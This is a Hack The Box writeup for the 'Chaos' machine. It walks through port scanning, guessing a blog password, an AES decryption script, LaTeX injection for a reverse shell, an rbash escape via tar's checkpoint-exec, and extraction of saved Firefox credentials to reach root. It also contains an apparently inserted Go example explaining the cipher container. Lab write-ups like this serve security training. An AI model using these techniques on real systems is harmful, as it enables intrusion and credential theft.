Hack The Box writeup – Chaos

Presenting Chaos. A nice machine which is a little CTFish but a lot of fun.

As usual we start with masscan.

root@kali:~/htb/chaos# masscan -p1-65535,U:1-65535 10.10.10.120 --rate=1000 -e tun0 > masscan.txt

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-05-28 20:27:57 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
root@kali:~/htb/chaos# cat masscan.txt                                       
Discovered open port 110/tcp on 10.10.10.120                                   
Discovered open port 995/tcp on 10.10.10.120                                   
Discovered open port 80/tcp on 10.10.10.120                                    
Discovered open port 143/tcp on 10.10.10.120                                   
Discovered open port 993/tcp on 10.10.10.120                                   
Discovered open port 10000/tcp on 10.10.10.120                                 
Discovered open port 10000/udp on 10.10.10.120 

Port 80 is open, so let's run gobuster to see what we can find.

root@kali:~/htb/chaos# gobuster -u http://10.10.10.120 -w /usr/share/wordlists/dirb/common.txt 

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.120/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/05/28 16:34:25 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/index.html (Status: 200)
/javascript (Status: 301)
/server-status (Status: 403)
/wp (Status: 301)
=====================================================
2019/05/28 16:34:45 Finished
=====================================================

Interesting results: we see /wp, which indicates the web server could be running WordPress. Browsing to /wp we can see a wordpress directory within it. Browsing to /wp/wordpress reveals a password-protected blog post written by the author "human". This is where it is a bit of a guessing game. Trying the password "human" works and reveals a username and password for webmail.

Let's use the Evolution email client against port 995 (ssl/imap, Dovecot imapd (Ubuntu)). We find a draft email with the following contents.

Now the objective is to decrypt the enim_msg.txt file using the same logic that was used to encrypt it in the first place. Below is the decryption script that can be used to recover the message. The password/secret for the decryption is "sahay", as mentioned in that email.

import sys
from Crypto.Cipher import AES
from Crypto.Hash import SHA256

def main():
    # Message file defaults to enim_msg.txt; a path on the command line overrides it.
    filename = sys.argv[1] if len(sys.argv) > 1 else "enim_msg.txt"
    chunksize = 16 * 1024
    # The key is the raw SHA-256 of the passphrase from the email.
    hasher = SHA256.new("sahay".encode('utf-8'))
    key = hasher.digest()

    with open(filename, 'rb') as infile:
        # Container layout: 16-byte ASCII plaintext size, 16-byte IV, then ciphertext.
        file_size = int(infile.read(16))
        IV = infile.read(16)
        # One CBC cipher object for the whole stream, so chaining carries across chunks.
        cipher = AES.new(key, AES.MODE_CBC, IV)
        plaintext = b''
        while True:
            chunk = infile.read(chunksize)
            if len(chunk) == 0:
                break
            # Ciphertext is already block-aligned; it must not be padded before decryption.
            plaintext += cipher.decrypt(chunk)

    # The encryptor padded the plaintext with spaces; the stored size strips them.
    # Write raw bytes so the output can be piped straight into base64 -d.
    sys.stdout.buffer.write(plaintext[:file_size])

if __name__ == "__main__":
    main()

We run the decryptor Python script on the message file and base64-decode the output to reveal the contents.

root@kali:~/htb/chaos# python decrypt.py enim_msg.txt | base64 -d
Hii Sahay

Please check our new service which create pdf

p.s - As you told me to encrypt important msg, i did :)

http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3

Thanks,
Ayush
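To make the container format handled by decrypt.py concrete, here is an added example (not the writeup's script and not the box's own encryptor) that builds and opens such a container: SHA-256 of the passphrase as the AES key, a 16-byte ASCII length field, a 16-byte IV, then CBC over the space-padded plaintext. It is written in Go because the standard library provides AES; the function names, the zero-padded length field and the fixed IV passed in for determinism are assumptions.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"fmt"
	"strconv"
	"strings"
)

// Key = bare SHA-256 of the passphrase, as decrypt.py derives it: no salt, no stretching.
func deriveKey(passphrase string) []byte {
	sum := sha256.Sum256([]byte(passphrase))
	return sum[:]
}

// sealMessage builds the container decrypt.py reads: 16-byte ASCII length
// (zero-padded, an assumption), 16-byte IV, then AES-CBC over the space-padded
// plaintext. iv is a parameter only for determinism; use crypto/rand in practice.
func sealMessage(passphrase string, plaintext, iv []byte) ([]byte, error) {
	if len(iv) != aes.BlockSize {
		return nil, fmt.Errorf("iv must be %d bytes, got %d", aes.BlockSize, len(iv))
	}
	block, _ := aes.NewCipher(deriveKey(passphrase)) // 32-byte key cannot fail
	pad := (aes.BlockSize - len(plaintext)%aes.BlockSize) % aes.BlockSize
	padded := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{' '}, pad)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return append(append([]byte(fmt.Sprintf("%016d", len(plaintext))), iv...), ct...), nil
}

// openMessage reverses sealMessage. The length field, not the padding, marks the
// end of the plaintext (a message ending in spaces is otherwise ambiguous). Nothing
// authenticates the ciphertext: a wrong passphrase yields garbage, not an error.
func openMessage(passphrase string, blob []byte) ([]byte, error) {
	if len(blob) < 2*aes.BlockSize {
		return nil, fmt.Errorf("input shorter than the 32-byte header")
	}
	size, err := strconv.Atoi(strings.TrimSpace(string(blob[:16])))
	iv, ct := blob[16:32], blob[32:]
	if err != nil || size < 0 || size > len(ct) || len(ct)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("length field inconsistent with ciphertext")
	}
	block, _ := aes.NewCipher(deriveKey(passphrase))
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pt[:size], nil
}
```

The unsalted single-hash key and the absence of any authentication tag are what make a short passphrase like "sahay" cheap to confirm offline: the only signal that a guess is right is whether the output looks like the expected base64.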

We can now add 10.10.10.120 chaos.htb to our /etc/hosts file and browse to that URL. It shows us a LaTeX PDF creator plugin page.

After a little trial and error we identify that the test3 template is vulnerable. We send our reverse shell text and click Create PDF. Our nc listener has now caught a shell.

root@kali:~/htb/chaos# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.120] 54932
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")';
www-data@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ whoami
whoami
www-data
www-data@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ 

We can now switch user to ayush using the password from the blog and capture the user flag. We get dropped into a restricted rbash shell though, so we need to escape it first to reach the user flag.

Using the tar > shell trick from https://gtfobins.github.io/gtfobins/tar/#shell we can get a better shell. We can then set the PATH variable to get a more usable shell.

root@kali:~/htb/chaos# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.120] 54934
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")';
www-data@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ whoami
whoami
www-data
www-data@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ su ayush
su ayush
Password: jiujitsu

ayush@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ whoami
whoami
rbash: /usr/lib/command-not-found: restricted: cannot specify `/' in command names
ayush@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
<ull --checkpoint=1 --checkpoint-action=exec=/bin/sh          
tar: Removing leading `/' from member names
$ export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin"
export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin"
$ whoami
whoami
ayush
$ cd ~/
cd ~/
$ ls
ls
mail  user.txt
$ cat user.txt
cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Now on to root. Inside the /home/ayush folder we see something interesting.

$ pwd
pwd
/home/ayush/.mozilla/firefox
$ ls -la
ls -la
total 20
drwx------  4 ayush ayush 4096 Sep 29  2018  .
drwx------  4 ayush ayush 4096 Sep 29  2018  ..
drwx------ 10 ayush ayush 4096 Oct 27  2018  bzo7sjt1.default
drwx------  4 ayush ayush 4096 Oct 15  2018 'Crash Reports'
-rw-r--r--  1 ayush ayush  104 Sep 29  2018  profiles.ini

We can use firefox_decrypt from https://github.com/unode/firefox_decrypt/tree/0.7.0. Archive the .mozilla directory and send it over to your Kali machine using netcat, then run the following. When prompted for the master password, use the password for ayush that was obtained from the blog.

root@kali:~/htb/chaos/firefox_decrypt# python firefox_decrypt.py ../home/ayush/.mozilla/firefox

Master Password for profile ../home/ayush/.mozilla/firefox/bzo7sjt1.default: 

Website:   https://chaos.htb:10000
Username: 'root'
Password: 'Thiv8wrej~'

Then use that root password to switch to root and capture the root flag.

$ su root
su root
Password: Thiv8wrej~

root@chaos:/home/ayush/.mozilla/firefox# cd /root
cd /root
root@chaos:~# ls
ls
root.txt
root@chaos:~# cat root.txt
cat root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
